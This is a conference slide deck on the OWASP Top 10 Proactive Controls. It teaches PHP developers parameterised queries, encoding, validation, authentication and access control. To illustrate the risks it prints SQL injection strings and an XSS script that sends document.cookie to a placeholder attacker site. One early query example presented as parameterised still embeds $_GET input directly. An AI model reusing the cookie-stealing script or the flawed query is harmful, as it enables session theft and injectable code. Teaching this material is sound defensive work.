Upload
katy-anton
View
391
Download
3
Embed Size (px)
Citation preview
OWASP Top 10 Proactive Controls
Katy Anton @katyanton October 2016 1
PHPNW16
OWASP Top 10 Risks - 2013 A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting ( XSS )
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10- Unvalidated Redirects and Forwards
2
Katy Anton
• Software development background • Certified Secure Software Lifecycle Professional (CSSLP)• Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls
@katyantonhttps://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016
4
Symfony implementation
Disclosure of information
SQL Injection
New Website
5
OWASP Application Security Verification Standard (ASVS)
6
C1. Verify for Security Early and Often
7
• Choose the level of security for your application • Security requirements and tests - OWASP ASVS• Verify for Security Early and Often (OWASP ZAP - continuous integration )
8
Proactive Control Risks prevented C1.Verify for security early and often
All OWASP Top 10 Risks!
SQL injection example
9
$email=‘;- - @owasp.org;$sql = UPDATE user set email=‘$email’ WHERE id=‘1’;
$sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’;
Becomes
C2. Parameterize Queries
10
Parameterize Queries prevent untrusted input from being interpreted
as part of a SQL command.
PHP:
<?php
$stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”);
$stmt->execute();
Example of Query Parametrisation
C2. Control: Data Access Layer
11
How not to do it !
C2: How NOT to
$sql = ”Update users set email=$_GET[‘email’] where id=$id”
This one string combines both the code and the input.
SQL parser cannot differentiate between code and user input.
12
C2. Control: Data Access Layer
13
PHP: Query Parametrization - Correct Usage<?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email’);$stmt->bindParam(':user_id', $id);
$stmt->execute();
14
Proactive Control Risks prevented C2.Parameterize Queries
A1. Injection
XSS example
15
<script type=“text/javascript”>var adr = ‘http://evilwebsite.com/send.php?cakemonster=‘ + escape(document.cookie);
var img = new Image();
img.src = adr;
</script>
C3. Encode Your Output
16
C3: Controls - Contextual Encoding
Symfony 2+ Twig
ZF2 Zend\Escaper
17
18
Proactive Control Risks prevented C3. Encode Output A1. Injection
A3. XSS
C4. Validate All Input
19
C4: Example of Validations
20
• GET / POST data (including hidden fields )• File uploads• HTTP Headers• Cookies• Database
C4: Controls
21
PHP filter extension, available as standard since v5.2
Example of both validation and sanitisation :<?php
$sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”;}
Input Validation Prevents 2nd Order SQL Injection
Register form
• Two users : “john” and “john’ - - “• Username value “john’ –-” becomes the
sql injection payload 22
john’- -Username
Password
Change password form:
Logged as john’ - -
2nd Order SQL Injection Example
23
Current Password
New Password
New Password
2nd Order SQL Injection Example
UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc'
UPDATE users SET password='123 ' WHERE username='john'
24
Becomes
25
Proactive Control Risks prevented C4. Validate All Input
A1. Injection A3. XSSA10. Unvalidated redirects & forwards
New Website
26C1
Verify for Security Early and Often
C3Encode Data
C4Validate Input
C2Parametrize Queries
C5. Implement Identity and Authentication Control
27
C5: Best practices
• Secure Password Storage• Multi-Factor Authentication• Secure Password Recovery Mechanism• Transmit sensitive data only over TLS (v1.2)• Error Messages • Prevent Brute-Force Attacks
28
C5. PHP Password storage
• password_hash(“my_password”)• since php v5.5• compatibility library for versions <5.5
29
C5. Password storage – How Not To
$password=bcrypt([salt] + [password], work_factor);
$loginkey =md5(lc([username]).”::”.lc([password]))
Be consistent when storing sensitive data!
30
C5. Forgot Password
Forgot password design:1). Ask one or more security questions
2). Send the user a randomly generated token
3). Verify token in same web session.
4). Change password.
Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
Error message for valid user
Error messages = be identical on both HTTP and HTML.How not to do it !
Error message for not-registered user
C5. Error messages
32
33
Proactive Control Risks prevented C5. Establish Identity and Authentication Controls
A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls
34
C6: Best Practices
• Deny by default
• Least privilege
• Force all requests to go through access control checks
• Check on the server when each function is accessed
35
C6: Role vs Resource based ACLsResource based
if (user.isPermitted("project:view:123")) { //show the project report button} else { //don't show the button}
36
Role based
if (user.hasRole("Project Manager") ) { //show the project report button} else { //don't show the button}
if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button} else { //don't show the button}
37
Proactive Control Risks prevented C6: Implement Appropriate Access Controls
A4. Insecure Direct Object References A7. Missing Function Level Access Control
C7. Protect Data
38
C7 Controls: Data in transitData in transit: HTTPS• Confidentiality: Spy cannot view your data
• Integrity: Spy cannot change your data
• Authenticity: Server you visit is the right one
39
MITM Protection - HSTS• HTTPS + Strict Transport Security Header
C7 Controls: Data at rest 1. Algorithm
•AES (Advanced Encryption Standard )2. Secure key management3. Adequate access controls and auditing
40
41
Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data
Exposure
New Website
42C1
Verify for Security Early and Often
C3Encode Data
C4Validate Input
C6Access Controls C5
Authentication
C7Protect Data
C2Parametrize Queries
C8. Implement Logging and Intrusion Detection
43
44
Proactive Control Risks prevented C8.Logging and Intrusion Detection
All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries
45
C9: Examples
• Framework with CSRF protection
• Framework with XSS protection
• ORM - SQL injection prevention
• Vetted Cryptographic algorithm
46
C9: Best Practices
Use trusted sources
Low-coupling
(Low-coupling == reduced attack surface)
Update regularly / replace
47
48
Proactive Control Risks prevented C9. Leverage Security
All OWASP Top 10 Risks!
C10. Error and Exception Handling
49
C10: Best Practices
Centralised error handling
Verbose enough to explain the issue
Don’t leak critical information
50
51
Proactive Control Risks prevented C10. Error and Exception Handling
All OWASP Top 10 Risks!
New Website
52C1
Verify for Security Early and Often
C3Encode Data
C4Validate Input
C6Access Controls C5
Authentication
C7Protect Data
C10Error Handling
C8Logging
C2Parametrize Queries
C9 Leverage security
It’s a Start
To Secure Software by Default!
53
Reference
OWASP Proactive Controls Project:
https://www.owasp.org/index.php/OWASP_Proactive_Controls
54
Thank you
55